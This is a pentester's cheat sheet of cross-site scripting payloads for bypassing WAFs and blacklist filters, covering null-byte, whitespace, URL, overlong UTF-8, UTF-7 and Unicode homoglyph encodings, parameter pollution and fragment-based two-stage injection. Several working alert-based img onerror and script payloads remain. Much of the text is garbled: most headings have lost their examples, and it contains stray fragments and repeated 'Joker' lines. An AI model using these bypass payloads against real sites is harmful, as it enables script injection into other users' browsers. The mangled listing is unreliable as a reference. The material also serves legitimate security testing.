# A collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering
Simple character manipulations.
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = %00).
HaRdc0r3 caS3 s3nsit1vITy bYpa55!
Null-byte character between HTML attribute name and equal sign (IE, Safari).
Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
Vertical tab between HTML attribute name and equal sign (IE, Safari).
Null-byte character between equal sign and JavaScript code (IE).
Null-byte character between characters of HTML attribute names (IE).
Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />
Null-byte character after characters of HTML element names (IE, Safari).
alert(1)
Null-byte character between characters of HTML element names (IE).
Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
Use vertical tabs instead of whitespace (IE, Safari).
Use quotes instead of whitespace in some situations (Safari).
Use null-bytes instead of whitespaces in some situations (IE).
Just don't use spaces (IE, Firefox, Chrome, Safari).
Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
No greater-than characters needed (IE, Firefox, Chrome, Safari).
alert(0)
Backslash character between expression and opening parenthesis (IE).
JavaScript Escaping
Encoding Galore.
HTML Attribute Encoding
URL Encoding
CSS Hexadecimal Encoding (IE specific examples)
Joker
Joker
Joker
Joker
JavaScript (hexadecimal, octal, and unicode)
JavaScript (Decimal char codes)
JavaScript (Unicode function and variable names)
Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
UTF-7 (Missing charset?)
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
Unicode .NET Ugliness
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
Classic ASP performs some unicode homoglyphic translations... don't ask why...
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
Useless and/or Useful features.
HTML 5 (Not comphrensive)
Usuage of non-existent elements (IE)
CSS Comments (IE)
Alternate ways of executing JavaScript functions
Split up JavaScript into HTML attributes
HTML is parsed before JavaScript
';
HTML is parsed before CSS
'); }
XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
URI Schemes
(IE)
(Firefox, Chrome, Safari)
(Firefox, Chrome, Safari)
HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2
Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
(Firefox)
http://target.com/something.jsp?inject=#alert(1)
Two Stage XSS via name attribute
Non-alphanumeric crazyness...